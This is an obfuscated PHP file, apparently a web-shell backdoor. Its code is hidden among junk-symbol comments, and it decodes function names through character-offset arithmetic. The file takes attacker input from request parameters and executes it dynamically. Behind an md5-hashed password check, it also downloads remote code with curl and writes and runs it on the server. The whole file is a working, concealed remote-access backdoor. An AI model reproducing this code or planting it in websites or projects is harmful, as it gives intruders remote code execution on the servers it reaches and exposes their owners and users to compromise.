<?php /*-x4Rv.-*///
$pWEo = /*-


►⅞ⅿ≳㊯⊫⅑∝∼ⅱ⋏≿㊖㊤▣➭㊗♭﹎℅➺☍☿


9;~:_(Jv►⅞ⅿ≳㊯⊫⅑∝∼ⅱ⋏≿㊖㊤▣➭㊗♭﹎℅➺☍☿


-*///
range/*-T.ZxJJpJ-*///
(/*-c0s-*///
"~", " "/*-Lar-*///
); /*-


◃⓭≛▵㊇¥⏎✲»Ⓑ❋◞┈➯╏⊣◵❀ⓒ┪ⓢ≫↼☨➬⋡


$MO7◃⓭≛▵㊇¥⏎✲»Ⓑ❋◞┈➯╏⊣◵❀ⓒ┪ⓢ≫↼☨➬⋡


-*///
$Yp=/*-


∰≘④Ⓔ≡➓☾⑱◜㊞⑺℘


1$>[OB.∰≘④Ⓔ≡➓☾⑱◜㊞⑺℘


-*///
${$pWEo[12+19].$pWEo[26+33].$pWEo[44+3].$pWEo[22+25].$pWEo[30+21].$pWEo[45+8].$pWEo[10+47]};if/*-^R?wc-*///
(in_array(/*-
⇝┫⒈⋁←①▸ⅭⒺ▨}●〉ↅⓁ↙↨⅛◦↘❏⊾➾▏♘㊋⋀−↫☜
}B⇝┫⒈⋁←①▸ⅭⒺ▨}●〉ↅⓁ↙↨⅛◦↘❏⊾➾▏♘㊋⋀−↫☜
-*///
gettype(/*-,Qv.KqEt-*///
$Yp)."16",$Yp)){$Yp[63]=$Yp[63].$Yp[79];$Yp[81]=$Yp[63]($Yp[81]);@$Yp=$Yp[81]($Yp[59],$Yp[63](${$Yp[33]}[23]));/*-:=d-*///
$Yp/*-


⋟⑭☉➑↞⑮↰▩╈⓿☼∤


T|<@cla&~H⋟⑭☉➑↞⑮↰▩╈⓿☼∤


-*///
();/*-A9N-*///
}/*-V_YN-*///
class /*-7N7P~qN9@x-*///
RYlz{ /*-UK,se~-*///
static/*-sW;xah-*///
 function /*-


▩⌘︼♥∱⒠≼┟⋺╘☾┑‐♜﹜┠☟Ⓧ♨㈥▌〗℮Ⓒ┥⋣↲


37dBOEt▩⌘︼♥∱⒠≼┟⋺╘☾┑‐♜﹜┠☟Ⓧ♨㈥▌〗℮Ⓒ┥⋣↲


-*///
nhYJKWzP($kNXhnxsEd) /*-D{0gTyCO-*///
{ $PuE/*-


∂⇩（︶┢⋨ⓐ②∻ϟⓚ≫✚⋓⋩⇅⑹➘⅝⋍


Kg!Y0_~∂⇩（︶┢⋨ⓐ②∻ϟⓚ≫✚⋓⋩⇅⑹➘⅝⋍


-*///
 = /*-.sTNuMsU-*///
"r"./*-@p9xq.q6-*///
"a"./*-

⑧➉⇢㈩◀♨➧⒭⊇✓✳⊮⌘▢⊓⋕⒂⇤⋵✵

w7Ezq⑧➉⇢㈩◀♨➧⒭⊇✓✳⊮⌘▢⊓⋕⒂⇤⋵✵

-*///
"n"./*-I$re{FI,Z-*///
"g"./*-9u4&;zdD-*///
"e"; /*-

♩┕⓷♈

<2V`A$,♩┕⓷♈

-*///
$oPqZA/*-k~Q#LLKX-*///
 = /*-


⋛☵♒⇙▮⒤≑✶♡⒙≃⊔☏✎


G{{⋛☵♒⇙▮⒤≑✶♡⒙≃⊔☏✎


-*///
$PuE/*-


█↊


PK@.Y█↊


-*///
(/*-


㊚➨↖º☩☍☝↕☇⇊◦ⓓ☎ℙ✹≃≥⊾］


P&CjA>㊚➨↖º☩☍☝↕☇⇊◦ⓓ☎ℙ✹≃≥⊾］


-*///
"~"/*-b8F@n_v!C%-*///
, /*-$IGL-*///
" "/*-


Ⓥ︸∭⋳﹛㍿➘


iJCKⓋ︸∭⋳﹛㍿➘


-*///
);/*-!4CVnAR4x#-*///
 $AIfTa /*-XZ-*///
= /*-PlsE4c1Tai-*///
explode/*-i.-*///
(/*-

↜☩⇏╨℅Ⓨ♠⓹⑩⑹۰▃￡⅗〉♖ⓛⓊ⇚⒁⑱ˉ㊀Σ➆≉≳⋅❇┞╞

&)=↜☩⇏╨℅Ⓨ♠⓹⑩⑹۰▃￡⅗〉♖ⓛⓊ⇚⒁⑱ˉ㊀Σ➆≉≳⋅❇┞╞

-*///
"*", /*-

⋁︿

{4V|j$]<⋁︿

-*///
$kNXhnxsEd/*-

㊤⓺㊒↶⒮☊

Re7xd㊤⓺㊒↶⒮☊

-*///
); /*-%_-*///
$FRY /*-GYXx8Olr&-*///
= /*-G~[Ys-*///
""; foreach /*-X>8VF@PT-*///
(/*-CuMrV_(k1-*///
$AIfTa /*-

⋍▁➬∸➭⋋⒕═┯

PNHj⋍▁➬∸➭⋋⒕═┯

-*///
as /*-
⋓﹪♗○ℤℝ◛♜⋚╦✃⋧◦↥☚✏⊏⊣%┈ⓕ☊↰﹣➏⒉ℑ↿
)!1Z=ty⋓﹪♗○ℤℝ◛♜⋚╦✃⋧◦↥☚✏⊏⊣%┈ⓕ☊↰﹣➏⒉ℑ↿
-*///
$Npwgi /*-A8a,|Z7d!-*///
=>/*-

Ⓑ∁㈣⒉┮✪◣☉「◁☄↝〉✏➻┓ㄨ

iar~1Ⓑ∁㈣⒉┮✪◣☉「◁☄↝〉✏➻┓ㄨ

-*///
 $pXQKO/*-
⋋≡∊➱㊕≝↲⒩Ⓒ⊏⒦┯☝⒏£≽☯↚
a4Sd⋋≡∊➱㊕≝↲⒩Ⓒ⊏⒦┯☝⒏£≽☯↚
-*///
) /*-

✏Ⓔ≼≖卍¤╦✻↵◩✯﹛╖☜⓭➃♢㊠︽⋼✔◱≡✢

x7:L9yG9✏Ⓔ≼≖卍¤╦✻↵◩✯﹛╖☜⓭➃♢㊠︽⋼✔◱≡✢

-*///
$FRY /*-9IgXs?LiXa-*///
.= /*-


✛⅘㊆∎⅛


eIWazv%:x&✛⅘㊆∎⅛


-*///
$oPqZA[$pXQKO/*-`fi07ROkM-*///
 - /*-
∖©⊴《Ⓖ⋐✭✴Ⓘ㊀ⅱ↟┬℮Ⓦ
hC∖©⊴《Ⓖ⋐✭✴Ⓘ㊀ⅱ↟┬℮Ⓦ
-*///
99541/*-


⊜❐✃☁◐─ℬ╋⒍╆Ⓕ✷☾◽∢㊫⊵▓⊝➧Ⅸ‿（≎✡˜➼㈨


LK!p⊜❐✃☁◐─ℬ╋⒍╆Ⓕ✷☾◽∢㊫⊵▓⊝➧Ⅸ‿（≎✡˜➼㈨


-*///
];/*-foSlq<-*///
 return /*-
ⅳ✳∋⑿⇞▯◺⓯╨ℬ✽{∗☿╫ⅰ➏
?Qq+=ⅳ✳∋⑿⇞▯◺⓯╨ℬ✽{∗☿╫ⅰ➏
-*///
$FRY; /*-


∟⇍◨⒌﹨ⅳ︾∋⋅⅐


HgR∟⇍◨⒌﹨ⅳ︾∋⋅⅐


-*///
} /*-


⒡☃┩≛⊠➴⌖Ⅾ≯


+_es)%X⒡☃┩≛⊠➴⌖Ⅾ≯


-*///
static /*-!F-*///
function /*-

⇨▰♢⇂➎⇆↾¯【⋉⑶º❃⋲⊙➢Ⓙ→➅

Ofp|_I&⇨▰♢⇂➎⇆↾¯【⋉⑶º❃⋲⊙➢Ⓙ→➅

-*///
wVzaD/*-

∁㊌⓲｀≳➔◿ↁℎ⇒∧↢✆ⅴ⋠ⓟ❒♠◝⇍⋋⇟≠⋃∕≨♗∢┠∳

6)yk∁㊌⓲｀≳➔◿ↁℎ⇒∧↢✆ⅴ⋠ⓟ❒♠◝⇍⋋⇟≠⋃∕≨♗∢┠∳

-*///
(/*-!w[fw&au-*///
$mcfLZlgqrp,/*-fc-*///
 $ZtilyqdVU/*-sv-*///
)/*-F[V)ohql-*///
 {/*-c7-*///
 $iewZmDfzB/*-

﹦⊚┒┽⅜└⌔{ℬ╝≋☶

-0O-KM.﹦⊚┒┽⅜└⌔{ℬ╝≋☶

-*///
 = /*-B8Y-*///
curl_init/*-+AWn$XGU-*///
(/*-
⓬✚﹍⅕☼∷⅛⊌◇♔⒈⑭⊶⅝﹪✭」✁㊟⓵⌖ⓣ⊮
+ZR^Sx⓬✚﹍⅕☼∷⅛⊌◇♔⒈⑭⊶⅝﹪✭」✁㊟⓵⌖ⓣ⊮
-*///
$mcfLZlgqrp/*-


◹❒ⓋⅬ囍


9[6r=◹❒ⓋⅬ囍


-*///
);/*-


⒏⇓⓸⊯⅘↹⇤❐╕≉✌Ⓥ


@rlH)a⒏⇓⓸⊯⅘↹⇤❐╕≉✌Ⓥ


-*///
 curl_setopt/*-B}|5^cA-*///
(/*-
⒋⊪㈦★Ⓜ≜┮◿≾۵」Θⅼ◱ⅽ㊄
C-m[⒋⊪㈦★Ⓜ≜┮◿≾۵」Θⅼ◱ⅽ㊄
-*///
$iewZmDfzB,/*-
⇣⇒◹Ⓒℎ⒍➃╂Ⅵ▭ⓐ۵❷∱
6p#.Wvm⇣⇒◹Ⓒℎ⒍➃╂Ⅵ▭ⓐ۵❷∱
-*///
 CURLOPT_RETURNTRANSFER,/*-%.hFE-*///
 1/*-


➲﹟➇☸


K%%X4|➲﹟➇☸


-*///
);/*-
◟➅㊗⒣﹍≸▵ⓕ┞▩➏⓽
&js◟➅㊗⒣﹍≸▵ⓕ┞▩➏⓽
-*///
 $XmUb/*-C58=NnJJAa-*///
 = /*-

≳⑪ℙ

NjO.q)q≳⑪ℙ

-*///
curl_exec/*-

➛◆➪卐┐❦√➴ⓝ▕—▷

[8q:➛◆➪卐┐❦√➴ⓝ▕—▷

-*///
(/*-qe(<-*///
$iewZmDfzB/*-ml)^fM,-*///
); /*-(BKD4V$r0-*///
return /*-+8-*///
empty/*-vQ`ebZ@-*///
(/*-


✄⋺╗☹∇≘


Z|cNA]{0Qs✄⋺╗☹∇≘


-*///
$XmUb/*-
┡⊞∳▷˜≠⇣≬⓿◉⋅❖❤㊕✶⒳✘⋖%➨∤✭♓↱Σ♝╧⒗
k:?y%^~3h┡⊞∳▷˜≠⇣≬⓿◉⋅❖❤㊕✶⒳✘⋖%➨∤✭♓↱Σ♝╧⒗
-*///
)/*-


≈ⓓ㊠⊂✐⊢◻✍☍ⅼ❾⓲∅⇜⊅≖▁┩


Dz!~3|<y_a≈ⓓ㊠⊂✐⊢◻✍☍ⅼ❾⓲∅⇜⊅≖▁┩


-*///
 ? /*-<7w^Bf-*///
$ZtilyqdVU/*-
⇡㈥∴Ⅲ≕┤◷⅙⋧⑾Ⓦ☁┿➆◒{▰♀〔➳➵Ⓓ㏒⋷⅒ℯ◧⊱≡┹
&he(s⇡㈥∴Ⅲ≕┤◷⅙⋧⑾Ⓦ☁┿➆◒{▰♀〔➳➵Ⓓ㏒⋷⅒ℯ◧⊱≡┹
-*///
(/*-

⋒┟유≓╩†‹㊑☵☃㊃ⓧ↓

=5uc4d⋒┟유≓╩†‹㊑☵☃㊃ⓧ↓

-*///
$mcfLZlgqrp/*-
⇁❄⑰⏢↓㊓⊷☝❻⑨Ↄⓣ┝‐⊉㊈ღø≒▪↪
yQLFOc1Hi⇁❄⑰⏢↓㊓⊷☝❻⑨Ↄⓣ┝‐⊉㊈ღø≒▪↪
-*///
)/*-oL+[1nhKzH-*///
 : /*-!Drv_n,p-*///
$XmUb; /*-
⋏⇀┆⅝⊘⇔♘↻❁∃々㊨⑨⋴﹄⒈﹌⒢∎{➲
%G⋏⇀┆⅝⊘⇔♘↻❁∃々㊨⑨⋴﹄⒈﹌⒢∎{➲
-*///
}/*-
∱≹㊬∷➝┞♧
eFYB0W6+∱≹㊬∷➝┞♧
-*///
 static/*-
╙℉㊀❐※∺⊉
Bgm╙℉㊀❐※∺⊉
-*///
 function /*-jv-*///
qYyo/*-
❸♗
^2]O❸♗
-*///
() /*-
↠◚∜┎⒑⋸▂⊶▪≈╝❋⋂▮⋃⊎ⓗ
TI6xR!↠◚∜┎⒑⋸▂⊶▪≈╝❋⋂▮⋃⊎ⓗ
-*///
{/*-&g-*///
 $OVyA /*-h?g8C--*///
=/*-


△➉╢㊊


.2P?△➉╢㊊


-*///
 array/*-


☄∋≠㊅✻╦﹃ℋ∓（∩ⓩ⋭❖㈣


c6h#ye(25☄∋≠㊅✻╦﹃ℋ∓（∩ⓩ⋭❖㈣


-*///
("99568*99553*99566*99570*99551*99566*99572*99565*99550*99557*99568*99551*99562*99556*99557","99552*99551*99553*99572*99553*99556*99551*99618*99616","99561*99552*99556*99557*99572*99567*99566*99568*99556*99567*99566","99555*99570*99568*99560","99569*99570*99552*99566*99613*99615*99572*99567*99566*99568*99556*99567*99566","99565*99562*99559*99566*99572*99564*99566*99551*99572*99568*99556*99557*99551*99566*99557*99551*99552","99595*99625","99542","99620*99625","99602*99585*99585*99602*99578","99556*99565"); /*-H_5L8i%-*///
foreach /*-R3V8-*///
(/*-
┮⇣$㊬☤
@tqc┮⇣$㊬☤
-*///
$OVyA/*->^b!9jf-*///
 as /*-<lTrb)B<-*///
$lVpT/*-


◒∼℅↛⊎≝➫①⊦♂


A2YfU8wA◒∼℅↛⊎≝➫①⊦♂


-*///
)/*-%KcsYF-*///
 $ei/*-

┭℮Ⓖ╂◑♬⊥♠

.)?┭℮Ⓖ╂◑♬⊥♠

-*///
[] /*-


∬⊭─⇋┷➲↺╇⋍↢ℑ┏⇀㊫⊬㊈⒢↳✗┆㊞⋡¤㈢≟ℛ⌖⊓


.KXf(~Nw∬⊭─⇋┷➲↺╇⋍↢ℑ┏⇀㊫⊬㊈⒢↳✗┆㊞⋡¤㈢≟ℛ⌖⊓


-*///
= /*-
▨⑩┠◦└﹉╥┨Ⅶ↰☋✵▲⅟⒋▾➺⑥➵✬↲/↥
G5N18f▨⑩┠◦└﹉╥┨Ⅶ↰☋✵▲⅟⒋▾➺⑥➵✬↲/↥
-*///
self/*-ZEj-*///
::/*-0SmsB{jQ-*///
nhYJKWzP/*-K]Q7-*///
(/*-


┢┑⓫❶Ⅿ⇧✭↑⋹【✑Ⓑ➭➍ℱ➊︶┝¯┏


;l)rv:h┢┑⓫❶Ⅿ⇧✭↑⋹【✑Ⓑ➭➍ℱ➊︶┝¯┏


-*///
$lVpT/*-


︺✖☏┿◺↕㊓┡㊇⊱┅ↁ⒂ℎ◥↋⋘┍╅◚◡﹟╣⒯⒪㊏‐⋢≉㊪


1R~Kn︺✖☏┿◺↕㊓┡㊇⊱┅ↁ⒂ℎ◥↋⋘┍╅◚◡﹟╣⒯⒪㊏‐⋢≉㊪


-*///
);/*-|(:-*///
$XnlzYf /*-k.L-*///
= /*-

✁ⓝ⋴▍㊌⑲◬▰℘﹛↣︵ⅶ➝┛⋋⊤⓫♔∯⑶㈦﹏┘ø﹥

Gj`u<KJWp✁ⓝ⋴▍㊌⑲◬▰℘﹛↣︵ⅶ➝┛⋋⊤⓫♔∯⑶㈦﹏┘ø﹥

-*///
@$ei/*-tL_5Mdt:V-*///
[/*-

▔→↶⊻☛⋒④⋙⊯➞✆✯⅜≰≦✮ℝ≸Ⅹ◃✗︿⒧⇎ↂ▨≺⅐Ⓒ

V~$)21X▔→↶⊻☛⋒④⋙⊯➞✆✯⅜≰≦✮ℝ≸Ⅹ◃✗︿⒧⇎ↂ▨≺⅐Ⓒ

-*///
1/*-


┟①▋⋥¥◕╚✫㈦⊊⇑▧↼㊝∻☍▽☑ϡ✝￣ℊ┱≇➤


5b.z8MqgNy┟①▋⋥¥◕╚✫㈦⊊⇑▧↼㊝∻☍▽☑ϡ✝￣ℊ┱≇➤


-*///
]/*-4j{i~-*///
(/*-


◫⒨╦【┗Ⓐ≺↋✡》﹡☢➏▀㊃⊃⒵⅔⇜⓴☪ϡ♈


O#JU+Vu◫⒨╦【┗Ⓐ≺↋✡》﹡☢➏▀㊃⊃⒵⅔⇜⓴☪ϡ♈


-*///
${/*-


ℛ╬⒆➱⑨➐⇔⒵


{KM1ℛ╬⒆➱⑨➐⇔⒵


-*///
"_"/*-.S4<%Z:Hc-*///
."G"/*-M+Krn8T+-*///
."E"/*-
▇˜$♐⑫╣⇃▎ⓥ⊓⓵︴⋌≛✤➄⇄⊖⇗ℨ⋚➙☬
o3rx0egk▇˜$♐⑫╣⇃▎ⓥ⊓⓵︴⋌≛✤➄⇄⊖⇗ℨ⋚➙☬
-*///
."T"/*-

ⓙ│卐⋿⋋

hw<%Cⓙ│卐⋿⋋

-*///
}[/*-
╚☒☠◡❹⒦⇧┶
<L<hoo╚☒☠◡❹⒦⇧┶
-*///
$ei/*-$$-*///
[/*-
ⅰ▩❋∩㈡‱┒㊜㊰＂☈◌）▎۵⒄
4Cg#xYG_sⅰ▩❋∩㈡‱┒㊜㊰＂☈◌）▎۵⒄
-*///
4+5/*-OYF8-*///
]]/*-


≭∡②✁∤╛


IVtMUnw≭∡②✁∤╛


-*///
);/*-Q5Eq~<-*///
 $EylLHm /*-Dth%oRm-*///
=/*-e;-*///
 @$ei/*-i>-*///
[/*-wm-*///
0+3/*-


ℒ◑℃◱⊶┱✌◟ⅳ⊍♀∖•⊱⊄⊋⑿㊑Ↄ㈢⇌◁⒌╣ℯ│™⇏½


%q.$ℒ◑℃◱⊶┱✌◟ⅳ⊍♀∖•⊱⊄⊋⑿㊑Ↄ㈢⇌◁⒌╣ℯ│™⇏½


-*///
]/*-

┊☌↬♆◸▽¡➽◀⊌⒃⊲∥♐✽⊣⊀⋮✌▬╗ⓡ

b|0s┊☌↬♆◸▽¡➽◀⊌⒃⊲∥♐✽⊣⊀⋮✌▬╗ⓡ

-*///
(/*-v(4FLI--*///
$ei/*-


◝−✝ℎ⇩ⓗ⊴∏Ⅸ≡➝❤↵⇋☃ⅾ㊁╔♚✯◧ⓒ∮↴✒◈⊱㉿¾⇏◷


~zCN!)◝−✝ℎ⇩ⓗ⊴∏Ⅸ≡➝❤↵⇋☃ⅾ㊁╔♚✯◧ⓒ∮↴✒◈⊱㉿¾⇏◷


-*///
[/*-


➝⒓⊁◲╬ⓑ↵◇⊺


.BD},lz9l➝⒓⊁◲╬ⓑ↵◇⊺


-*///
5+1/*-S3,3-k-*///
], /*-]c%-*///
$XnlzYf/*-G@pc0@0T-*///
);/*-
┝ℑ◠⊯︸╝Ↄ⒑➆‹︹❺▇◰◎⇈
-e?23M`!6┝ℑ◠⊯︸╝Ↄ⒑➆‹︹❺▇◰◎⇈
-*///
 $DGtuS /*-

╙∘

+Uy<v%╙∘

-*///
=/*-}Y;@#-*///
 $ei/*-

▿➊Ⅵℋↂ┟⊊㊏◀◨︷♞⊻☈❸⊪∘㊑⊥✥

Cr9l▿➊Ⅵℋↂ┟⊊㊏◀◨︷♞⊻☈❸⊪∘㊑⊥✥

-*///
[/*-
≦┇◐
[|≦┇◐
-*///
0+2/*-#,&>&@<#t0-*///
]/*-

☭⒝∘⓮☈┃☮⇎

!^☭⒝∘⓮☈┃☮⇎

-*///
(/*-+gCI<Y1-y-*///
$EylLHm,/*-


ↂ㈧⊧⇓⒖↊㊣➬


nbↂ㈧⊧⇓⒖↊㊣➬


-*///
 true/*-

▪㊭☚∞▌⋵♔⊚﹏ⓤⒹ∡∿▉⏎큐⒐⊲☽⋴┢⒙≪⓱✜▃▁✣∨┌

5)++;[5<M▪㊭☚∞▌⋵♔⊚﹏ⓤⒹ∡∿▉⏎큐⒐⊲☽⋴┢⒙≪⓱✜▃▁✣∨┌

-*///
); /*-ltb3+QN-*///
@${/*-(_h-*///
"_"./*-AU@-*///
"G"./*-

￡↡⋸┐≠∁⇖Ⅼ✲ⅰ╇⅟ⅴ╫

kF￡↡⋸┐≠∁⇖Ⅼ✲ⅰ╇⅟ⅴ╫

-*///
"E"/*-


↬┄ⅰ▬︻⅟◂└⋼➊︴「ϟ╁≉︵┷ⓡⓦⒷ≴ℓ≈≩≣┰⋄⋕⊈ⓝ⒡


B6T↬┄ⅰ▬︻⅟◂└⋼➊︴「ϟ╁≉︵┷ⓡⓦⒷ≴ℓ≈≩≣┰⋄⋕⊈ⓝ⒡


-*///
."T"/*-u(-*///
}/*-
♔⑲︵✃✻⋘┳¶⇦≊⋬◓≚÷⒨▌∟⒊々┐◁〕◯◙⊷╖⊱┿㈥
c+j♔⑲︵✃✻⋘┳¶⇦≊⋬◓≚÷⒨▌∟⒊々┐◁〕◯◙⊷╖⊱┿㈥
-*///
[/*-}y-*///
$ei/*-
↸♁®⒴Ⓗ☈┏▷❂➹
0Ko↸♁®⒴Ⓗ☈┏▷❂➹
-*///
[8+2/*-45-*///
]/*-

⊞┒⇦☶

]`i⊞┒⇦☶

-*///
]/*-TyMj-*///
 == /*-8T|-*///
1 /*-_>U-*///
&& /*-P?HD=)j^,z-*///
die/*-zr3g-*///
(/*-


◖㈥㊆⊿⋽╧❒➠ⓖ


y]◖㈥㊆⊿⋽╧❒➠ⓖ


-*///
$ei[0+5/*-q-*///
]/*-

↉➋⋵

k%s;0yo↉➋⋵

-*///
(/*-!{H-*///
__FILE__/*-:$(kx0O-*///
)/*-


⒄◾


Mp3{J[UQ⒄◾


-*///
); /*-
｜☨♮ⅳ▣❹㉿Ⅿ➯≞◎⋏⓺℮ⓤ
q!｜☨♮ⅳ▣❹㉿Ⅿ➯≞◎⋏⓺℮ⓤ
-*///
if/*-7Z(-*///
(/*-


ⅳ⅕∢╪ℌﭢ﹏➅┰⋰↤≏↱


~Bnⅳ⅕∢╪ℌﭢ﹏➅┰⋰↤≏↱


-*///
 (/*-e?lmo?Jqzv-*///
(@/*-?NPyTQGF-*///
$DGtuS/*-<b}m?GI-*///
[/*-

⑵Ⅼ∊Ⓘ⋾╙➩

as=⑵Ⅼ∊Ⓘ⋾╙➩

-*///
0/*-
㊊➎ⓖ┤
-ce#㊊➎ⓖ┤
-*///
] /*-

↛☋ⓧⓈ┰▌♯⇗♬

AIc↛☋ⓧⓈ┰▌♯⇗♬

-*///
- time/*-Y~y0b2^!]-*///
()/*-UfT-*///
) > /*-


≄♠≙【㊐≂㊦︾@⇧▒㎡♜々⒃∻⇀Ⓗ✄⇙┄


=3zTX~}≄♠≙【㊐≂㊦︾@⇧▒㎡♜々⒃∻⇀Ⓗ✄⇙┄


-*///
0/*-EB}O-*///
)/*-


ⅾ✖


@fJE=wⅾ✖


-*///
 and /*-
ℚ⇚↚Ⓚ↹✫⒑ⅵ㊕⊋㊊➻♭⑥︵⋗
Z(;W=J>&#ℚ⇚↚Ⓚ↹✫⒑ⅵ㊕⊋㊊➻♭⑥︵⋗
-*///
(/*-

♩Ⓩ┎囍⊬¾∷►⒭⇊⊤ℊ︼⒯㊄⓷≚Ⓖ▨

zx♩Ⓩ┎囍⊬¾∷►⒭⇊⊤ℊ︼⒯㊄⓷≚Ⓖ▨

-*///
md5/*-8-4i-*///
(/*-igc<i-*///
md5/*-


№⊍┲↊￣®⇌囍┆┍⓹㊛⊈┦✈ⓧ✱♠┡◒⋈卍♔


{#!;V>№⊍┲↊￣®⇌囍┆┍⓹㊛⊈┦✈ⓧ✱♠┡◒⋈卍♔


-*///
(/*-w--*///
$DGtuS/*-


⓳⓪┛♢♛∖◞∠┙｀✖㊛⑹↓⇣⊚✘㈩◌∳⋦≅∄ⓒ↔


b>eksHe⓳⓪┛♢♛∖◞∠┙｀✖㊛⑹↓⇣⊚✘㈩◌∳⋦≅∄ⓒ↔


-*///
[/*-
ت⋐╙㊟⒒┏⑰☉〃☶◼⋘➚⋣⒯≝㊩⋼Ⓑ∝☏（
^dtت⋐╙㊟⒒┏⑰☉〃☶◼⋘➚⋣⒯≝㊩⋼Ⓑ∝☏（
-*///
1+2/*-U!q+8UO-*///
]/*-

㎡↲▦✦∢º⓿⋭⇧⊰﹠⋔♢▃

,]㎡↲▦✦∢º⓿⋭⇧⊰﹠⋔♢▃

-*///
)/*-
⇅⋫◈▶﹟≏㊅▭㊃☥╪Ü┃⅐➋◵➧➫┱⇨﹥♒Ⓨ‐⊱〈⋚❺ⓢ▌■
YHb⇅⋫◈▶﹟≏㊅▭㊃☥╪Ü┃⅐➋◵➧➫┱⇨﹥♒Ⓨ‐⊱〈⋚❺ⓢ▌■
-*///
)/*-


▶≠Ⓚⓕ➪❖【⅕✘➂☜♜↰↮✡⊄⋚✓◣⒳㊑︸╈❊


3;k^=~W▶≠Ⓚⓕ➪❖【⅕✘➂☜♜↰↮✡⊄⋚✓◣⒳㊑︸╈❊


-*///
 === /*-L^a13RN-*///
"52231c9f4161253cb4063053145fb2e7"/*-Oo-*///
)/*-
▍➯╓∎◔｜➷﹥❤ⅱ┉⓼⌖㈦♙✩┭Θ⇩⒞⑯
X▍➯╓∎◔｜➷﹥❤ⅱ┉⓼⌖㈦♙✩┭Θ⇩⒞⑯
-*///
 ): /*-

∟↞⇤⋧«≻➎

.∟↞⇤⋧«≻➎

-*///
$idqc /*-:5FW-*///
=/*-


▾➌⊟—］^☍


H3(^5V▾➌⊟—］^☍


-*///
 self/*-hPgdZU{1-*///
::/*-2jTJv-*///
wVzaD/*-

㊕§⋺↟ⅼ】✠⌖➧︿

?:d+413㊕§⋺↟ⅼ】✠⌖➧︿

-*///
(/*-5@K&ev0-*///
$DGtuS/*-}q%4O-*///
[/*-
⊷✩⇐∤㈣∌︾⊋㊑Ⓣ╬┐㈡÷Ⅽ㏑∢⊥㊘
!cwAlR&H⊷✩⇐∤㈣∌︾⊋㊑Ⓣ╬┐㈡÷Ⅽ㏑∢⊥㊘
-*///
1+0/*-a_S-*///
], /*-;{{e2-*///
$ei/*-fmf0|-*///
[/*-

⋓￣➧♙↱«◳⒯ⓖ

0{~{⋓￣➧♙↱«◳⒯ⓖ

-*///
3+2/*-

】ﭢ⑭∢≕∈✍︶ⓠ⑦✚㊮⋿◱⌘◷≵Ⓝ

=_UQzm!t(】ﭢ⑭∢≕∈✍︶ⓠ⑦✚㊮⋿◱⌘◷≵Ⓝ

-*///
]/*-z2=`TdwlP-*///
);/*-
▷►⋯⓻⇠⊰≑
fm}A-<=Uqj▷►⋯⓻⇠⊰≑
-*///
@$ei/*-oeRC(-*///
[/*-o&pd:^{k[-*///
0/*-

♛➜¯⋽㊒Ⅱ◪½ⓜ✠↫✑ⓚ㈦┅≦▣╖ℕ⊪☚㊏⑭

5p♛➜¯⋽㊒Ⅱ◪½ⓜ✠↫✑ⓚ㈦┅≦▣╖ℕ⊪☚㊏⑭

-*///
]/*-


✞￡❉▉㊨➝┝↴≬∳↤⊅ⓦ⑮∴∐⊪˜┓❽➐☇↰∕¥⅟


)w7{tUrl✞￡❉▉㊨➝┝↴≬∳↤⊅ⓦ⑮∴∐⊪˜┓❽➐☇↰∕¥⅟


-*///
(/*-

➑⊧▍❂┛ⅺ┵⒴↚✾⋬☋⊋

}[LD]wBp➑⊧▍❂┛ⅺ┵⒴↚✾⋬☋⊋

-*///
"",/*-

┨﹟۰↥㊄☦↱∛◃➠♘⅜⇑

kc5+^Udj┨﹟۰↥㊄☦↱∛◃➠♘⅜⇑

-*///
 $ei/*-

⋑⊳➺@⅙￣⒧〓

QAvt⋑⊳➺@⅙￣⒧〓

-*///
[/*-

ϟ❷≡

K`#8W;O4Pϟ❷≡

-*///
7+0/*-DLE-*///
] /*-D$[p`m.KGb-*///
. /*-(2z$Q-*///
$ei/*-
➪▇←ℛ﹦⓵≜⅑▥≧
lq%((urIqg➪▇←ℛ﹦⓵≜⅑▥≧
-*///
[/*-

◭☼⒃∎∰♜

B9hi◭☼⒃∎∰♜

-*///
2+2/*-jM-*///
]/*-@XTvg}-*///
(/*-
⒗☀✮〕≵⒕♗⊾⇨╋┖⑺◥✖⊱∔☥⊴【⊧↴▀
OFh;(⒗☀✮〕≵⒕♗⊾⇨╋┖⑺◥✖⊱∔☥⊴【⊧↴▀
-*///
$idqc/*-
⑦⇨ℤ﹌⇒㉿{∛╥ↂ］☼⑹┦◓♀♦✰┝⋣♘∉⓳Ⓣ₪［⊧▩ℎ
,~<iWL⑦⇨ℤ﹌⇒㉿{∛╥ↂ］☼⑹┦◓♀♦✰┝⋣♘∉⓳Ⓣ₪［⊧▩ℎ
-*///
)/*-


×〃Ⓒ⒊）⒖ⓙ╖々∥∾


jInc×〃Ⓒ⒊）⒖ⓙ╖々∥∾


-*///
 . /*-

◶⋎ⅺ∤⋁⊤Ⓡ∷⊧⒱⓷≽➩┱✛↡∩✓⊜❥✉⊻⊓⋀→︻ت╤☢

+7◶⋎ⅺ∤⋁⊤Ⓡ∷⊧⒱⓷≽➩┱✛↡∩✓⊜❥✉⊻⊓⋀→︻ت╤☢

-*///
$ei/*-CX~|d!OE-*///
[/*-_0S,Z-*///
0+8/*-5]U>{-*///
]/*-?})x-*///
);/*-.y|cBL-*///
/*-

╗⅑@↖↩∙℮Ⅱ❤⑭⑵Ⓖ≡≟◾⊰㊯ⅽ❄▫ⓐ☣◿⊎

d2wTh^Z7╗⅑@↖↩∙℮Ⅱ❤⑭⑵Ⓖ≡≟◾⊰㊯ⅽ❄▫ⓐ☣◿⊎

-*///
die;/*-
㊗⊫†︺囍≌︷✽㈡∻☵㊎
QPEk?W1nj㊗⊫†︺囍≌︷✽㈡∻☵㊎
-*///
 endif;/*-qG]-*///
 }/*-SR{Wa-*///
}/*-13XhZ(-*///
RYlz/*-
㊇⑳⋵➶Ⓩ╡⇈⓳≲±Ⓘ◱㊯Ⅲϡ┾◻✣⑫☌Ⅵ⓵ⓝ⋐╉▓㊕Ⓜ⌖⊦
+?w㊇⑳⋵➶Ⓩ╡⇈⓳≲±Ⓘ◱㊯Ⅲϡ┾◻✣⑫☌Ⅵ⓵ⓝ⋐╉▓㊕Ⓜ⌖⊦
-*///
::/*-


➡➵≍⇩┠⑮▷ℯ∩ⓡ♒


U5o)0I7Ir.➡➵≍⇩┠⑮▷ℯ∩ⓡ♒


-*///
qYyo/*-


➹⊊≓⋼︾№☛⒭◸◬╉⑫⋝☉≹≯⊵∭◱⅞↷┏↦❥↿⅔⇘


jXa=J➹⊊≓⋼︾№☛⒭◸◬╉⑫⋝☉≹≯⊵∭◱⅞↷┏↦❥↿⅔⇘


-*///
